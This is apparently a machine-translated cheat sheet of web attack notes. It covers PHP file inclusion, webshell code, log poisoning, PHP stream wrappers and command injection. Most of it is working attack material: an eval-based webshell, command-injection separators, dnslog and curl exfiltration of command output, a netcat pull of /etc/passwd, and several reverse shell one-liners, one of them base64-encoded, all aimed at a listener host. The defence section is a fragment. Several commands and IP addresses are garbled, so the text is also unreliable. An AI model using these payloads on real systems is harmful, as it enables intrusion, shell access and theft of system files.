web Vulnerability analysis

The file contains a vulnerability

The local file contains

 Common files contain functions 
include（） Cannot find the containing file , Script continues 
require（） Cannot find the containing file , Report errors , Stop script running 
include_once() If the code in the file has been included, it will not be included again 
require_once() If the code in the file has been included, it will not be included again 

 Local include file 
 Introduce malicious code <php phpinfo();eval($_post['cmd'];)?>

Include log files getshell

error journal    Write Trojan , Connect 
 Log 

Modify environment variables

 Grab the bag , modify user-agent：<?php phinfo();?>, Contract awarding 
 visit  /proc/self/environ

phpinfo The file contains temporary files

 Write the file to the temporary directory 
 Using scripts 

php Fake protocol

file:// Access local file system （ Absolute path / Relative path read ）
http:// visit http Website 
ftp：// visit ftp urls
php://input  take post The requested data is treated as php Code execution   Conditions （ Remote include open ）
	php:/input post The incoming content is executed as code  
php://filter Read source code 
	php://filter/read=convert.base64-encode/resource='' Read file contents , With base64 Show , Generally, read the configuration file 
phar：//  Read compressed file 
zip://
bzip2://
zlib://	
data://text/plain;base64, Ciphertext   Open remote include 

The remote file contains

The remote file contains

file=http://192.tp://168.45.164/1.php  Website + file   Both are on
 The file contains a truncation attack  gpc close 

Remote command execution vulnerability

system() With echo 
passthu() With echo 
exec() Echo the last line , must echo
shell_exec()  No echo   Must output 
popen() No echo 
proc_open() No echo 
 Command execution connector 
;
|
||
&
&&
and
or
`   echo `whoami`
echo $(whoami)  $ Replace backquotes 
windows
type C:\windows\win.ini
 No echo 
 Pipeline character writing shell
echo "" |base64 -d >shell.php
dnslog Record 
ping `whoami`.6hkgih.dnslog.cn
 Use the log to test whether there is echo 
curl http://192/.168.3.12/?`whoami`
wget http://192.168.3.12/?`whoami`
 Command Execution Vulnerability rebound shell
netcat
nc -lp 9999>pass.txt  Remote server listening 
nc  192.168.0.124 9999 </etc/passwd
 Victim rebound shell
  /bin/bash -c 'bash-i>&/dev/tcp/192.168.0.124:80 0>&1'
  rm/tmp/f;mkfifo/tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.124 80>/tmp/f
 echo 'cm0vdG1wL2Y7bWtmaWZvL3RtcC9mO2NhdCAvdG1wL2Z8L2Jpbi9zaCAtaSAyPiYxfG5jIDE5Mi4xNjguMC4xMjQgODA+L3RtcC9m' |base64 -d |bash

defense

escapesh

## ellarg function  safe_mode_exer_dir Executable file path   Internal implementation , Do not write external execution  ```